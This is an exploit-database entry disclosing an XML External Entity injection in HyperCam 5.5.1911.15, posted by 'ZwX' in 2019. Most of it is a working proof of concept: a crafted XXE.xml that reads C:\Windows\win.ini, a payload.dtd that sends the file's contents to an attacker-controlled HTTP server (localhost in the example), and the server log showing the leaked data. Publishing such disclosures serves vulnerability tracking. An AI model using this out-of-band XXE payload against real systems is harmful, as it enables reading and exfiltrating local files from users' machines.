HyperCam 5.5.1911.15 - XML External Entity Injection

2019.11.18

ZwX (FR)

Risk: Medium

Local: Yes

Remote: Yes

CVE: N/A

CWE: N/A

#Exploit Title: HyperCam 5.5.1911.15 - XML External Entity Injection
#Exploit Author : ZwX
#Exploit Date: 2019-11-16
#Vendor Homepage : https://www.solveigmm.com/
#Link Software : https://www.solveigmm.com/files/SolveigMM_HyperCam_Home_Edition_5_5_1911_15.exe
#Tested on OS: Windows 7
[+] Exploit : (PoC)
===================
1) python -m SimpleHTTPServer 8000
2) Create file (.xml)
3) Create file Payload.dtd
4) Open the software HyperCam
5) Click About -> Check For Updates
6) Drag the file (.xml) into the window
7) External Entity Injection Successful
[+] XXE.xml :
==============
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
[+] Payload.dtd :
=================
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;
[+] Result Exploitation :
=========================
C:\>python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
ZwX-PC - - [16/Nov/2019 18:21:33] "GET /payload.dtd HTTP/1.1" 200 -
ZwX-PC - - [16/Nov/2019 18:21:33] "GET /?;%20for%2016-bit%20app%20support[font
s][extensions][mci%20extensions][files][Mail]MAPI=1[MCI%20Extensions.BAK]3g2=MPE
GVideo3gp=MPEGVideo3gp2=MPEGVideo3gpp=MPEGVideoaac=MPEGVideoadt=MPEGVideoadts=MP
EGVideom2t=MPEGVideom2ts=MPEGVideom2v=MPEGVideom4a=MPEGVideom4v=MPEGVideomod=MPE
GVideomov=MPEGVideomp4=MPEGVideomp4v=MPEGVideomts=MPEGVideots=MPEGVideotts=MPEGV
ideo[MCTools]ctl=24224[Zip-n-Go]ctl=24224NU=1Version=4.9ID=10518 HTTP/1.1" 301 -
ZwX-PC - - [16/Nov/2019 18:21:33] "GET /?;%20for%2016-bit%20app%20support[font
s][extensions][mci%20extensions][files][Mail]MAPI=1[MCI%20Extensions.BAK]3g2=MPE
GVideo3gp=MPEGVideo3gp2=MPEGVideo3gpp=MPEGVideoaac=MPEGVideoadt=MPEGVideoadts=MP
EGVideom2t=MPEGVideom2ts=MPEGVideom2v=MPEGVideom4a=MPEGVideom4v=MPEGVideomod=MPE
GVideomov=MPEGVideomp4=MPEGVideomp4v=MPEGVideomts=MPEGVideots=MPEGVideotts=MPEGV
ideo[MCTools]ctl=24224[Zip-n-Go]ctl=24224NU=1Version=4.9ID=10518/ HTTP/1.1" 200
-

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

HyperCam 5.5.1911.15 - XML External Entity Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.